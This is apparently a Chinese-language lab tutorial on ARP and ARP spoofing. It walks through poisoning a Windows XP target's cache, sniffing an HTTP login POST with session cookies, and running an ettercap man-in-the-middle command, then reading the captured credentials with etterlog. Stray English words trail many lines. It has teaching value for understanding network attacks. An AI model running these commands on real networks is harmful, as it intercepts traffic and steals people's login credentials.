ARP:php
地址解析協議,根據IP地址查詢MAC物理地址,以便進行物理網絡通訊。ajax
ARP原理:緩存
A電腦192.168.1.2想與B電腦192.168.1.3通訊,網絡通訊必需知道對方的MAC物理地址才能夠傳輸數據,因此A電腦在網絡上廣播說:IP地址是192.168.1.3是誰,把你的MAC物理地址告訴我。不是B的電腦收到廣播後發現跟本身無關,就不回話,只有B電腦進行回話告訴A本身的MAC物理地址。網絡
ARP欺騙原理:app
C電腦192.168.1.7,MAC地址爲xx.xx在網絡上廣播撒謊說:個人IP是192.168.1.1,個人MAC物理地址是xx.xx,收到消息的電腦都記住了這種假信息(存留在ARP緩存表裏),今後之後發送給192.168.1.1的數據都會發給MAC地址xx.xx(192.168.1.7)C電腦了。url
攻擊原理:通常家庭裏電腦上網都會將數據發送給網關(路由器),若是讓目標靶機電腦上的ARP緩存錯誤的存爲攻擊機的信息,攻擊機就能夠假裝成網關,這樣目標靶機全部數據都會發給攻擊機,實現劫持。命令行
網關:192.168.1.1 (路由器)excel
靶機:192.168.1.8 (Windows XP)code
攻擊機:192.168.1.7(Linux)orm
查看靶機ARP緩存信息:
C:\Documents and Settings\Administrator>arp -a
Interface: 192.168.1.8 --- 0x2
Internet Address Physical Address Type
192.168.1.1 ec-xx-xx-xx-xx-3f dynamic
開機攻擊:
C:\Documents and Settings\Administrator>arp -a
Interface: 192.168.1.8 --- 0x2
Internet Address Physical Address Type
192.168.1.1 08-xx-xx-xx-xx-5e dynamic
192.168.1.7 08-xx-xx-xx-xx-5e dynamic
到查看靶機的圖片
C:\Documents and Settings\Administrator>arp -a
Interface: 192.168.1.8 --- 0x2
Internet Address Physical Address Type
192.168.1.1 ec-xx-xx-xx-xx-3f dynamic
嗅探靶機http網絡帳號密碼:
POST /login.php?nowtime=1545925967777&verify=fba67eef HTTP/1.1.
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*.
Referer: http://www.xxx.com/thread.php?fid=38.
Accept-Language: zh-cn.
Content-Type: application/x-www-form-urlencoded.
UA-CPU: x86.
Accept-Encoding: gzip, deflate.
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2).
Host: www.xxx.com.
Content-Length: 109.
Connection: Keep-Alive.
Cache-Control: no-cache.
Cookie: dd452_lastvisit=1769%091545925789%09%2Flogin.php%3Fnowtime1545925789701%26verifyfba67eef; dd452_lastpos=other; dd452_ol_offset=11543; dd452_ipstate=1545924020; _ac_app_ua=8a8f4074b5cc6c0ef5; dd452_cloudClientUid=5450535; dd452_threadlog=%2C38%2C..
jumpurl=http%3A%2F%2Fwww.xxx.com%2Fthread.php%3Ffid%3D38&step=2&ajax=1&pwuser=aaaaaaa&pwpwd=bbbbbbb&lgt=0
使用命令行:
攻擊命令:
sudo ettercap -Tqi en0 -M arp:remote /192.168.1.4// /192.168.1.1// -l /tmp/log
會在/tmp下生成log.eci與log.ecp的文件,直接用etterlog就能夠查看
etterlog log.ecp